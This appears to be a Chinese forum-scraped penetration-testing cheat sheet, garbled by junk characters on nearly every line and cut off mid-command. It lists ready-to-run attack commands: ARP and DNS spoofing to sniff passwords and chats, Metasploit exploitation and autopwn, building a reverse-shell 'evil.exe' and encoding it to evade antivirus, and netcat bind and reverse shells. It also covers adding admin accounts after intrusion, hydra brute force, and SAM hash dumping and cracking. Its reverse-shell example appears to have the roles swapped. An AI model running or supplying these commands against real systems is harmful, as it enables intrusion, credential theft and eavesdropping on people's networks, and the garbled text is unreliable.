whois 域名/ip 查看域名的详细信息。! b$ S0 O7 W1 f/ I Z& Z
9 _8 O; p! d- w* j% G( ]ping 域名/ip 测试本机到远端主机是否联通。
7 m* o4 T# t* a* d9 ~8 [# p5 {
2 g! ? W! K- n. Gdig 域名/ip 查看域名解析的详细信息。+ C/ i) W, c6 G4 s0 O
' C+ m7 M0 k, \& L
host -l 域名 dns服务器 传输zone。/ U( Q+ r, H; A9 y) r2 W. d
2 Q& Q5 K+ [0 C2 ^) K. F扫描
# c, |, l7 G/ B5 @
4 e" ^ V m9 T4 T( x0 \# C. |/ U1 Vnmap:/ r1 G! ?8 c3 H; f/ v
{& u( a" r1 F7 j5 k# x& `0 _
-sS 半开扫描TCP和SYN扫描。
, Q" J+ E9 O+ V, C5 W6 n8 G8 ~6 U
- z# y( O& u- s-sT 完全TCP连接扫描。8 f& {6 a6 `5 [; G% i* W! ^$ Z# S3 K" X
9 O$ L! d$ y# p, i3 d D1 F
-sU UDP扫描
, j. S+ x3 T h$ i 5 F# I! }- u, f* V( P. m" D4 s
-PS syn包探测(防火墙探测)
) u) p: u8 W& ^5 L1 ^- l8 t1 w " l! |9 g! \5 k3 Z
-PA ack包探测(防火墙探测)
: }8 x3 _- O' T- r% Q ! p- H4 X6 p1 H0 ?5 `6 z& m2 \
-PN 不ping。
. l, ` v# b7 f/ ] 8 T+ f+ A% {; V s2 f! A! l
-n 不dns解析。: ~) f9 D) F Q- |/ W a
7 |1 m; B9 ?" x) L
-A -O和-sV。
/ _+ ^; b( c" Y4 ?, z4 U0 C
+ ]' Z! O# v+ Z- J4 |% w7 J. B% S-O 操作系统识别。" x' C2 w( \+ S j
* s" j U' g6 @! g
-sV 服务版本信息(banner)
* r D2 O. J1 N g. v/ o9 b6 A6 w
$ _& @$ g! D Q3 L. K-p 端口扫描。
% z5 Z% Y& \8 W( ]- P$ _2 V: U0 P 0 N& P9 f* t: m8 `& I9 v- S
-T 设置时间级别(0-5)6 t8 \( {7 L1 J) ^
" n) p6 x; E( D1 `0 p# K
-iL 导入扫描结果。
" K! D2 v# {! r- a* A' Q 1 Q, e; _0 ~! V- O$ u
-oG 输出扫描结果。
+ j8 e, ]- Q% t+ M: H/ U
- b. {; C& U4 G& |% r8 \" a' @
- R, r, T- |* m6 s( d [( Z/ I
( D: c9 h3 d* z Y9 y) }操作系统识别: c/ T- \) k9 Y6 G, r7 F9 `9 P
5 p- X/ H4 n! N9 G# M
p0f -i eth0 -U -p 开启混杂模式。9 u6 M, {4 M5 G+ K" R
0 m& p% v4 i0 Q! l3 ^, t
xprobe2 ip|域名 检测os。
* R. L6 p4 f/ F! [- E
* _( c% U$ B& {3 Obanner获取:
+ k* u- F3 d$ [8 x8 F7 C+ h& U
! }. D. `7 r7 O$ c1 u& w* w ^nc ip port 检测端口是否打开。
( `( f* _" r6 n, x& ^1 b& V# d
: Y: h2 e$ j5 ctelnet ip port 检测端口是否打开。
0 c7 F( G' Y4 ?# R2 q
- _6 }1 g' \( M6 mwget ip 下载主页。
: X M& H% a& w5 b' n
( \6 i- y; ^2 V7 a- B' L2 ~/ Acat index.html | more 显示主页代码。
0 @' h7 X/ N0 C1 ?
6 P% L1 I% K: R0 ~q 退出。8 @- m# M2 I, ?* Z
4 W3 J" }" G/ j o; P. c
windows枚举: D. i2 C/ F8 H& ~5 l
4 S: o C$ w% s# E; q# x0 Q% j3 G
nmap -sS -p 139,445 ip 扫描windows。
8 ?3 f6 u# b# n& a Z 2 |% D. O* r2 C' w# P6 Z
cd /pentest/enumeration/smb-enum ) w- N3 P! o( ?2 x
& `4 B7 C/ X( U- ?* P9 `- W. R# t
nbtscan -f targetIP 检测netbios。
/ K1 y7 r% V9 X+ K1 D2 Z 7 w W6 i' w6 L7 Y: C+ F6 B
smbgetserverinfo -i targetIP 扫描name,os,组。
( C. T8 v' G9 ~) l; K
2 f/ X. K" h* osmbdumpusers -i targetIP 列出用户。
, T) b- Q) ?4 A7 b y
; S/ W9 ?3 ^7 j/ D9 c A3 u9 R) gsmbclient -L //targetIP 列出共享。/ z |1 q6 u& k J' a6 o
) o( y9 z. {1 R( H- Y4 L$ t' A, c使用windows:
5 I% X. j3 c* ? s$ A: H ! C! H! m8 w8 N, W p
net use \\ip\ipc$ "" /u:"" 开启空会话。
8 f" ?, n3 y8 y( t$ B
7 y2 C: K A' X- D( ]1 h# Ynet view \\ip 显示共享信息。
4 A+ l/ e% t2 @& D$ @ 8 |6 k. l& Z; _5 M K
smbclient:
0 e; S. O. e. D% O7 u7 t 2 @, \. e; V( {+ n# V
smbclient -L hostName -I targetIP 枚举共享。- c. w) Y: n) h5 O3 T* J
3 I3 E& h8 N9 \+ T) U
smbclient -L hostName/share -U "" 用空用户连接。
6 d4 O+ G2 p' A0 F( L& ]
5 T# a7 M! s8 j4 ^# msmbclient -L hostName -I targetIP -U admin普通用户连接。4 g1 a( n% |0 c/ v' b \' z
4 h$ F* u) v" y: X h( a7 G7 Lrpcclient:
% u1 O d; W/ A/ b* e ) k- [3 b! O- j4 u
rpcclient targetIP -U “”打开一个空会话。
3 `& j( {0 ?6 p) a# J2 L" \, S, _
5 |; M% Q+ x! L' Z4 Cnetshareenum 枚举共享。9 Y) T- V/ R( s, j% {
' Y6 k2 `1 y+ j" K
enumdomusers 枚举用户。
& Y2 Y3 j" n# T' R* y
/ ?) Y4 E. ]% F) Z% G2 V( Xlsaenumsid 枚举域SID。- N* Z0 \; H5 K/ K% M
7 K: ^8 y& b+ w' k \) }) Rqueryuser RID 查询用户信息。+ T( v) t+ q5 i6 t( }
/ K4 d1 Z' p$ Icreatedomuser 创建用户访问。
' K6 D5 y, i3 M9 i j
$ D7 [! L& U, {+ D( l+ i6 I% gARP欺骗:
$ M+ _- G. ~# w0 n 6 ^2 S6 b1 H3 Z. u( ~ h i
ettercap:* M/ i/ X$ d4 l8 o
3 F3 Q' O' s2 l1 u: L
nano /usr/local/etc/etter.conf配置文件4 o: F3 H0 c6 }4 g* N& @
9 L r! {4 v' ?8 t
Sniff > Unified sniffing > Network interface: eth0 > OK 设置抓包的网卡: P L4 i, v4 Q
" L( H* z# X; b& \% J/ YHosts > Scan for hosts (do this two times)扫描网段的主机) Y5 a1 r( R2 A! R( f- o( s+ q
$ M. C7 W- P. v2 c, C6 L
Hosts > Hosts list 显示主机列表
# U2 l1 l" V, l8 r$ m( `
% u1 ?, u8 V' C+ }3 D2 PSelect the default gateway > Add to Target 1 添加主机, |' z" U6 g" e6 A- J) k
4 i+ F. t- e- n) O" W$ ]( YSelect the target > Add to Target 2 添加主机
' [! F7 w) ]. G+ f, D
& F' P4 s, ~1 k- x, i9 ^Mitm > Arp poisoning > Sniff remote connections > OK 设置ARP攻击# J0 l- j/ }/ L; m# j2 v g! Z }
8 I" a7 J7 Z& C) j
Start > Start sniffing 开始攻击
5 T" m) N | f9 r$ f. J
+ a8 F7 n6 V W( i' X2 H& L$ Ndsniff -i eth0 监听网卡窃听登录用户密码
2 N$ B1 x5 y0 W9 L8 X8 @6 s' J
" N( A& C4 J+ |) G" l' @0 M; Zurlsnarf -i eth0 嗅探http请求1 K D( q: h/ l: \2 G
6 z' e- z7 e/ H9 g/ E8 [' B& u5 i1 e
msgsnarf -i eth0 嗅探聊天软件的聊天内容
3 ?! Q; t: s4 ^
& [5 w7 z8 S1 n! d+ F! Wdriftnet -i eth0 网络管理嗅探图片,音频。2 |3 i1 E8 x* u R* r. }
" E) k2 X% Z0 J cnano /usr/local/share/ettercap/etter.dns编辑配置文件8 u/ n" `0 U- A! D" H
6 _0 m' Y1 i i3 E
Plugins > Manage the plugins > dns_spoof 设置dns欺骗
& i! T- ^% \$ y* J# U# K . r6 }4 j% {4 J' P9 G3 L4 ?( q
Mitm > Arp poisoning > Sniff remote connections > OK 设置ARP
6 O# B) l3 R* e- r' R
7 _1 l" z- ?& h) L& t0 GStart > Start sniffing 开始攻击
! Z8 m9 ^! Q" @" F9 `7 W) {) w/ a
7 Q0 u0 i! p( L: G1 C' t& i w4 w! t P! K, d9 B/ r; m g% K
* t% z0 }$ [+ m6 t2 }Exploits漏洞利用:
* F3 |/ V7 o# [6 E$ J! b ! T8 j9 D/ F1 ]" Y9 x
cd /pentest/exploits/exploit-db 进入目录
( K, g. G4 y4 Z6 {, r! f8 B: [
# E h$ u! ]) D) z. S+ wcat sploitlist.txt | grep -i [exploit] 查询需要的漏洞
6 g# I2 _, ~2 N! `, b , k$ ~+ Y6 \: Z- v) t3 t) j6 p. g
cat exploit | grep "#include"检查运行环境 ^: [. b7 G7 A2 f- U' l
. w$ {2 ^# e5 T# i
cat sploitlist.txt | grep -i exploit | cut -d " " -f1 | xargs grep sys | cut -d ":" -f1 | sort -u只保留可以在linux下运行的代码
2 Z( e1 m2 c' e/ n( s5 w 5 |5 Q& D. k) w- z% b
% c- \8 @7 I* o! J$ I8 A+ C
1 E8 X) t6 g6 G3 t' S; AMetasploit: " [4 z/ _1 J; N& J. B8 R/ ^
5 M# j, w/ ~- u: S
svn update 升级
$ o1 P, G8 k0 u/ ~0 G * t! x+ m F) I5 F" E o
./msfweb Web接口127.0.0.1:55555。.' v+ w9 V# L3 ^7 [* b t
: ~, B0 u" V% b- K9 E3 b3 w./msfconsole 字符下的Console。8 S9 ~- a c& b. a6 W# `4 I0 y
) x/ [) M( b) g
help 帮助
8 O6 ?; [1 i0 q3 S& D- Z 0 |# ?. z2 j% B: e, D. j
show <option> 显示选项
/ x' A% B' \9 a* b. \
3 v8 X+ {9 ]$ m) c+ Z- ^3 n" Jsearch <name> 搜索名字
) A* y' P3 D3 O5 ^ ' n0 W2 k& ~# p% _+ B4 b
use <exploit name> 使用漏洞
! J Q( E, K6 h g" t+ ]. t
- Z0 [6 s5 p6 v2 C2 {7 c- Oshow options 显示选项
: d: A; G) K& B" ^0 z ' N. `7 X8 z6 V5 Y% R
set <OPTION NAME> <option> 设置选项9 K" w3 y/ B0 p; i; F# k7 t- n
/ s$ M3 T: I$ |show payloads 显示装置
9 Y( o7 M! u8 v4 v
5 L& M+ Y4 U/ y. O$ ~set PAYLOAD <payload name> 设置装置! Q- s& l$ {, D4 B. s# Q3 [$ E4 u
' n; i) y6 f3 E W9 ^, H+ ?6 } ^
show options 显示选项
1 b+ R8 X" }. P; T# P2 ] ' W- ^. R4 s# G' R& ~8 m' C
set <OPTION NAME> <option> 设置选项
+ V9 ?8 x9 m7 w1 U7 }) M: w+ }5 B 7 w5 U$ ~4 x/ F3 ]- E2 I
show targets 显示目标(os版本)
% x' r/ i/ q% H0 Q. p
0 b4 A: F' I! P: m. rset TARGET <target number> 设置目标版本( M. U( \( l9 q% P7 B. Z! V
* n& K! ^$ X- x, m- w1 Z
exploit 开始漏洞攻击' ~' }7 T& f0 d# w% d3 \" J; J( T' F) L
f! c. M, {* H, d& S$ d! \
sessions -l 列出会话
# g5 d5 j1 [& D0 p( J# r
3 j$ v0 a1 e& o5 h8 {' {* Ysessions -i <ID> 选择会话
' ~3 a$ V' V' {& b5 U
7 A8 d) {" Z8 T% q/ ~% r7 a8 z8 Msessions -k <ID> 结束会话% O" |1 l% p0 ]( ~5 b2 A. v
! T0 V* e$ {& \- |- L5 ^" C$ |
<ctrl> z 把会话放到后台
: N0 B9 p, @9 a7 U" s" |
" U! W+ {1 _5 \! a+ b% L. m( r<ctrl> c 结束会话" j9 t% t3 J5 M+ D/ l
- i& z* p8 l, V* b% d+ c2 B6 ~
jobs 列出漏洞运行工作0 R M. j+ m2 r+ B1 c3 q: w
5 ` J8 P1 q& v; c9 B. c+ j, Ijobs -K 结束一个漏洞运行工作' q2 X* g9 T- o* W8 {% p4 b
) Q. Z% [0 p! v8 t6 i
show auxiliary 显示辅助模块
% M5 |* N+ }- g# ?( p f# p 0 Z* {- M0 L' C1 s
use <auxiliary name> 使用辅助模块
$ V6 O9 m( n- ?8 r* u& o ; Z M( g/ y2 p
set <OPTION NAME> <option> 设置选项
3 x$ v. u1 a3 G ; m* l% v* M, P3 W# j- j
run 运行模块* y+ U3 {# F* } {, N) b
8 f1 o+ F5 h6 R- qscanner/smb/version 扫描系统版本
) S4 P" w* u1 Q
! j6 Y# r0 o5 u; b3 Bscanner/mssql/mssql_ping 测试mssql是否在线
* K# j0 D0 f% Q" z! }" f % x: C* U* P0 N- Q8 s/ z( W
scanner/mssql/mssql_login 测试登录(暴力或字典)
$ M; Y# H! m8 B7 A! S ( n4 ^. [8 K" i+ N
Attacker behind firewall: bind shell正向
' k# p, ?# T- J' @3 z # B. x, Q8 r. h8 _* e
Target behind firewall: reverse shell反向+ @+ Z) ]& H% U; q8 X2 b
3 L1 ?, E9 h) g: P( CMeterpreter衔接不懂dos的可以用这个:2 `0 Y" p/ j8 T; Z' g2 M
$ \9 D! T( u; a& l
db_import_nessus_nbe 加载nessus的扫描结果
+ h3 s7 y7 f4 n 3 ]+ n- @- V0 K) a; v% Z& W' W
db_import_nmap_xml 加载nmap的扫描结果2 R6 f' ^' A7 V: r q
. t4 p: b, g& x# I$ F自动化攻击流程:
) O5 d8 B. k; a# V& d. L* q$ M
9 ^6 C7 M+ v! l- n) acd /pentest/exploit/framework3 ; {$ ]7 ]' X2 v7 L! w
& O9 d+ A& b! A3 p' O: H. \/ \./msfconsole' d$ q3 [& e* y% n$ Z( O
2 f: E$ Q9 i3 k* \9 H. E8 J
load db_sqlite3
& L% H) k/ `* [5 B/ J2 V
- l1 d7 J6 ^; H/ J. B# }8 pdb_destroy pentest
; G8 O4 q5 [/ b ( B& R0 b- L$ Z3 }/ p5 \
db_create pentest
; _! S! B' D. U& h3 U
( m# y' b! J! e. V6 ]db_nmap targetIP
% n( p4 |) o4 R2 y
( J. e' @% ~5 Y- }% `db_hosts% `- L4 B! a+ y% O3 w
9 h( r0 p* o' ^& Vdb_services
+ W; ] A- K9 i0 J+ p9 C/ G ! h+ A w7 e2 J1 m* x* Y
db_autopwn -t -p -e3 w7 h8 m4 V5 w: O, o# X. h, \
4 E3 `$ q0 A: p9 B字符接口攻击流程:
' J3 v F( t8 J f, j2 H8 m ! A$ q7 N* g9 O& i2 d7 y& F
./msfcli | grep -i <name>
1 t) U1 o& I. e. Z, }7 M! a+ s
* v* h( H! O# E./msfcli <exploit or auxiliary> S
2 [: w+ ~6 Q# J2 f |# B : u9 ~$ B) U7 Q- I: G( i
./msfcli <exploit name> <OPTION NAME>=<option> PAYLOAD=<payload name> E! c3 ]/ a8 d: W. L, U0 {
7 ^" M% S [' ^" Z" ]- Q, i5 e! @做木马后门等:/ H' C. S4 f5 j5 Y3 d: s. c6 \/ l
+ x$ q- @: {$ W" s./msfpayload <payload> <variable=value> <output type>
* h" _+ x4 f9 k$ s1 n1 R
7 n$ t- a+ _$ w! K DS summary and options of payload
2 B7 q0 F4 b. f/ P3 o ! y* R, ]2 B6 D% W# U7 n
C C language
/ |) M, E4 w0 J2 r: @4 ^ . W- K, f6 z( O& F. ?* P7 y& \
P Perl
- F7 \0 w: P' P, \9 d8 Y2 b4 w ! q8 @* b, _7 F. W- R, Y: ^
y Ruby
8 e0 {2 k( k, P. Y: D
1 f3 e) m( C0 G8 N4 o! n' x+ MR Raw, allows payload to be piped into msfencode and other tools
* _5 J5 G0 [- b* B* x
" K# P2 u& ?* s& v2 eJ JavaScript
' W' o7 v3 J4 J/ M! U- Q [
% ? H' o# P5 }& Q( EX Windows executable2 |2 d( s4 D. E# B* w
" V; ?4 w& R q: d./msfpayload windows/shell/reverse_tcp LHOST=10.1.1.1 C
1 ] w1 }. U7 J/ P2 {" I$ M
8 B. n: c q0 m+ E, ^7 |./msfpayload windows/meterpreter/reverse_tcp LHOST=10.1.1.1 LPORT=4444 X > evil.exe
/ s# l% M1 P2 w6 W* q1 q 9 I, w0 v) E. Q: k% s3 v
编码处理就是做免杀:9 v8 f& J2 n1 y( M5 v( y5 e! U
2 M5 e; h5 V: x3 N! X./msfencode <options> <variable=value>
# F, j, L1 g9 g: b. f8 h- n: x X : `0 Q! z, H; h5 [. `
./msfpayload linux_ia32_bind LPORT=4444 R | ./msfencode -b '\x00' -l
2 x5 ?9 s1 L2 l$ Y
1 l& Z/ F) d. D0 D: H6 T./msfpayload linux_ia32_bind LPORT=4444 R | ./msfencode -b '\x00' -e PexFnstenvMor -t c. ~3 _7 R& H4 |7 p% F9 @9 N% y
* P+ A6 S$ u$ |3 V- h8 A
. P2 [8 P5 y5 ?. f: t) l- W
6 m U P1 a0 Y1 |$ ~入侵后在windows下添加管理员用户:
/ @) j' j7 n! y" I, q0 h& r6 g & D# I" u/ P/ [6 S7 f
hostname 查看主机名
; @: R& S9 M, v' E1 g+ i
$ e( R. v' W- l4 T$ L2 s$ ~# r( Anet users 查看用户, \5 o$ R3 D" N
3 W8 c% [( Z# G+ |8 \6 M' G; xnet user 用户 密码 /add 添加用户
9 ~8 {" ?* V+ F' x% |: k
5 S* U' k4 o/ v. K. P7 @net localgroup 查看工作组; g4 Y% M& F2 O' H9 L
! Z( w" }4 s7 cnet localgroup administrators 查看管理员组
* l$ w4 s3 O1 R, H( m) L% }
4 O9 E3 }% C$ j# b& d, q% B# X# ]net localgroup administrators x /add 将用户加入管理员组, i6 \* L3 L6 O1 e& P
4 L; H1 x S C1 v9 j ~7 H
7 k/ `6 \* w! }) t
5 E! k( t u) h) M* P7 ETFTP# @$ n0 J$ V) ?! Y0 e. a
( x9 T. g0 k. E8 Ucp /pentest/windows-binaries/tools/nc.exe /tmp/传递到tftp上$ K, l2 P+ j" W9 W! R* {
2 N( ^, l f/ U& W p# q' S; _tftp -i 10.1.1.2 GET nc.exe下载
* U( ?$ g: J5 T" |7 u ) A5 p3 f- E, d% O# O
netcat瑞士军刀
0 f8 a& J/ R8 W5 e; R$ V8 n z* A. D1 {4 j6 S. G
attacker: 10.1.1.1
2 b6 u$ ?6 Y4 s: f6 G # v! S8 @7 T, c: W$ J/ v
target: 10.1.1.2
% r, N5 A J; P: ^2 P! l 1 C" G" T+ z0 x4 Y. \! k1 G( ~6 ^
nc -v -z 10.1.1.2 1-1024 端口扫描
2 A% O7 A. j+ R2 x7 ]- F
2 D! k- G) s* h% Ztarget: nc -lvp 4444 聊天设置(服务)1 a+ }6 _! I6 g2 _
. l5 Q, C; L$ R8 C- jattacker: nc -v 10.1.1.2 4444 聊天设置(客户)
5 v7 s, _% m& U, r! e& R. p, H
( l2 f/ O" J) B' ztarget: nc -lvp 4444 > output.txt传输文件(接受)! s5 v# F- `- }9 E3 _& D
: ~9 T# ~. H3 Q) v2 D7 ^1 h
attacker: nc -v 10.1.1.2 4444 < test.txt传输文件(发送)( I+ h6 s+ W$ q4 I2 \! R
! G% x8 }/ s V+ n/ W
target: nc -lvp 4444 -e cmd.exe Bind shell。( Q% n* U4 U5 ?: Z3 `. @9 d
6 R0 b I( M0 nattacker: nc -v 10.1.1.2 4444' z! K( f2 ^1 C- U9 w+ f
) R* Y' u4 [; c! g2 z( s
target:nc -lvp 4444 Reverse shell。
) [. u# Y$ I- o7 ~2 A 5 R, |( u# O1 X; @" z
attacker:nc -v 10.1.1.2 4444 -e /bin/bash
/ b+ m! ^! z/ b' n, z+ E
6 b& @3 c# W. R/ K
) S$ w) U) V) @ & _4 N, L6 A6 Y& G. C
密码
+ s+ h$ d- E, o6 X
8 `* O1 i; a% n字典zcat /pentest/password/dictionaries/wordlist.txt.Z > words
2 p# ?3 @3 [$ c* D C 7 `. ?- x |6 M- X% j& K
cat words | wc -l显示个数(30多万个) + e* o( R1 i' g9 s
2 a2 f4 W. f/ U" x9 h) V! W3 b暴力:$ j e+ m" {& j) j' [
/ o) i7 L) H) ?, Bhydra -l ftp -P words -v targetIP ftp 攻击ftp。% Q, |. V0 Y- a `0 D# j2 ]2 X4 \
9 _7 x& d$ ?& H( C0 E' S9 `hydra -l muts -P words -v targetIP pop3 攻击pop38 x7 F- l3 s( e% I6 O0 o2 X
4 i: u. H7 Q- L8 H2 `
hydra -P words -v targetIP snmp 攻击snmp/ [ }# g, X4 t5 J+ I- I- J
1 i$ S* N) Q) o# a攻击microsof VPN
+ G; O/ S1 R4 |9 i8 ^1 \0 b ' U0 R. A7 ^/ W7 N) `0 ^
nmap -p 1723 targetIP
: P- h' t) U" d4 }! l$ n( w) z
6 K8 t& h9 K( ^! { xdos2unix words' ]& c5 e) t8 g$ e
& ?, n; i2 i9 V9 r( c) m Dcat words | thc-pptp-bruter targetIP
$ Z1 C* k% g9 K% M C, |8 J+ ^ / a# {: ]2 y9 q T7 _
WYD:! _% K9 ^1 m6 q- {
S& \$ y7 t1 T) iwget -r www.target.com --accept=pdf 下载pdf文档
e* m, c4 T: T; u. a 8 ~. |* Q9 D- H6 H2 P
wyd.pl -o output.txt www.target.com// l4 j' z8 Z% b
6 x: }7 |/ z0 W) wcat output.txt | more& R7 j7 l0 t$ }
& I5 }, |4 g- ]! _0 _
SAM文件(windows下的密码文件):
# [4 @( x% D' ~& |7 ?: p ! Z( l4 C# F4 M6 p4 M( R
%SYSTEMROOT%/system32/config+ E5 Z: e, t* u# L% z7 ~7 T6 i
- d; S$ i* V/ `' ^3 [ L
%SYSTEMROOT%/repair
K I" R& { m3 i2 o @, W# N1 z+ { . q5 C, J4 |8 X; ^& Y
备份windows的hash文件:
6 j% s9 g& ~. f- ^7 Z" S & _' \' `( w4 `7 D3 t/ B1 g/ ]
./msfcli exploit/windows/dcerpc/ms03_026_dcom RHOST=targetIP PAYLOAD=windows/meterpreter/bind_tcp E
' j5 U3 R' a& M; u0 h 9 K/ C1 v, H( D I; e1 M
meterpreter > upload -r /tmp/pwdump6 c:\\windows\\system32\\8 j- }8 ?2 v1 l0 i) }
, v7 c5 m. ?, ?2 _: m/ Q3 nmeterpreter > execute -f cmd -c
8 r2 p0 e8 X: j1 d. J; f- S ( S, p5 \ R2 J
meterpreter > interact x
" ?4 M& n! I8 c6 z6 ]' {% H/ ^" r ) n" @: H% Y' V
C:\WINDOWS\system32> pwdump \\127.0.0.1! I2 x' q# B3 Z) I6 ]7 k
. h9 h/ t' e* Ajohn破解密码:
. r }9 w3 s9 p4 C
$ @, W& K6 X k* b* ]. }% X2 hcp hash.txt /pentest/password/john-1.7.2/run/
4 L t, t! q( ^, d+ r, g( |1 @3 ~ - {; l7 m& [0 p- J1 y! V
cd /pentest/password/john-1.7.2/run/3 @1 w0 k+ Y4 m2 ?( r' j
& y& f6 U" z A; _2 l./john hash.txt2 o) f9 v! Y' y# y w
; \/ u6 |1 V% ]& e彩虹表:4 W" o5 ], A$ z. r2 R5 c' Z
" W) a$ u- X2 qrcrack *.rt -f hash.txt) H" N, e$ s: I2 J; X2 \* A
: a& C3 A: i( \! U9 | + v1 q! p2 ^$ A3 z* {. ~8 Q: c
8 P" [5 j1 t; S- A本地修改密码:
5 Z% f- w0 J% n3 z 1 W; O- m+ e& i: ?6 `
mount
1 O- U& \9 |" M7 v3 q0 s9 z
' h; b' a( k5 A* lumount /mnt/hda1
% `4 p% T: C0 _/ `* a1 c$ d
+ \# d1 O4 p* u/ @1 f7 `modprobe fuse
0 N6 g% R) w: u7 |- B0 Q7 R2 O6 _+ }9 ?
3 T6 i7 |. U, F# Tntfsmount /dev/hda1 /mnt/hda11 n/ A( a* q3 M7 K
" l8 c5 e+ a" ]8 f. E) H
mount |
|